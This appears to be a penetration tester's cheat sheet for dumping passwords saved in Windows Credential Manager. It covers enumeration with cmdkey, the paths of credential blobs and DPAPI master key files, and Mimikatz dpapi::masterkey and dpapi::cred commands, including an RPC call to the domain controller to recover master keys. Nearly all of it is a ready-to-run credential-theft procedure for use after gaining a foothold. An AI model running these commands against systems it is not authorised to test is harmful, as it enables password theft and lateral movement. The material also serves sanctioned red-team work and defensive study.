Skip to main content

Dumping Passwords from Windows Credential Manager

Credential Enumeration

cmdkey /list

In reverse shells, I have noticed that it's impossible to spawn processes using runas.exe /savecred /user:DOMAIN\username if the credential is stored in Windows Credential Manager.

That said, we may still be able to dump the password using the Mimikatz dpapi module, which is how these credentials are protected.

Common Locations for Cached Credentials

# Legacy CMD Environment Variable
"%USERPROFILE%\AppData\Local\Microsoft\Credentials"
"%USERPROFILE%\AppData\Roaming\Microsoft\Credentials"

# PowerShell Environment Variable
"$env:USERPROFILE\AppData\Local\Microsoft\Credentials"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Credentials"
ls -r -h ~\AppData\Local\Microsoft\Credentials\ | select -expand fullname
ls -r -h ~\AppData\Roaming\Microsoft\Credentials\ | select -expand fullname

Enumerate any stored credentials

Common Locations for Encryption Keys

# Legacy CMD Envrionment Variables
"%USERPROFILE%\AppData\Local\Microsoft\Protect"
"%USERPROFILE%\AppData\Roaming\Microsoft\Protect"

# PowerShell Environment Variables
"$env:USERPROFILE\AppData\Local\Microsoft\Protect"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Protect"
ls -r -h ~\AppData\Roaming\Microsoft\Protect\ | select -expand fullname

Enumerate any stored keys

Use Mimikatz to Unprotect DPAPI Data

Cache Master Keys

mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d /rpc
mimikatz # dpapi::cache

Make RPC call to domain controller to retrieve master key when password is unknown

Unprotect Cached Credentials

mimikatz # dpapi::cred /in:C:\Users\user_name\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

Go through each cached credential file and attempt to unprotect it using the cached encryption keys

 

References

https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets

https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey

https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials